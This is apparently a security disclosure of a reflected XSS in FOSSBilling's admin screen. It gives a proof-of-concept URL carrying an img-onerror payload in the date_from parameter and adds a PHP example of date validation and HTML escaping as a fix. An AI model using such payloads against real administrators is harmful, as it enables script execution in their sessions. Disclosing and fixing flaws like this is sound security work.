There is a reflected XSS in the FOSSBilling admin screen.
By accessing the following URL, it is possible to execute arbitrary script in the browser of a logged-in administrator user.
URL: https://localhost/admin?_url=%2Fadmin&date_to=2023-07-08&date_from=%27%22%3E%3Cimg%20src=x%20onerror=alert(3)%3E
'"><img src=x onerror=alert(3)>
date_to
date_from
https://drive.google.com/file/d/1Zha4cWz-dBM8PWpmLvQUU2zHn2g_6PME/view?usp=sharing
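One way the two reflected parameters could be handled on the server, added here as an example and not FOSSBilling's own code or fix. The function names are hypothetical, and it assumes both values are dates in YYYY-MM-DD form (as date_to is in the URL above) that are echoed back into an HTML attribute.

```php
<?php
declare(strict_types=1);

// Added example, not FOSSBilling code. Function names are hypothetical.

/** Accept only a real calendar date in YYYY-MM-DD form; anything else becomes null. */
function parseDateParam(?string $raw): ?string
{
    if ($raw === null || !preg_match('/\A\d{4}-\d{2}-\d{2}\z/', $raw)) {
        return null;
    }
    $date = DateTimeImmutable::createFromFormat('!Y-m-d', $raw);
    // Round-trip comparison rejects overflow dates such as 2023-02-31.
    if ($date === false || $date->format('Y-m-d') !== $raw) {
        return null;
    }
    return $raw;
}

/** Encode a value for an HTML attribute or text node, both quote styles included. */
function escapeAttr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request mirroring the query string in the report's URL.
$query = [
    'date_to'   => '2023-07-08',
    'date_from' => '\'"><img src=x onerror=alert(3)>',
];

foreach (['date_from', 'date_to'] as $name) {
    $raw   = $query[$name] ?? null;
    $clean = parseDateParam($raw);

    // Layer 1: a value that is not a valid date is dropped, so the field renders empty.
    printf("<input type=\"date\" name=\"%s\" value=\"%s\">\n", $name, escapeAttr($clean ?? ''));

    // Layer 2: even if the raw value were echoed, encoding keeps it inside the attribute.
    printf("%s raw value, encoded for output: %s\n", $name, escapeAttr((string) $raw));
}
```

Validation alone is not enough if another template echoes the raw request value, so the output encoding stays in place for every reflected parameter.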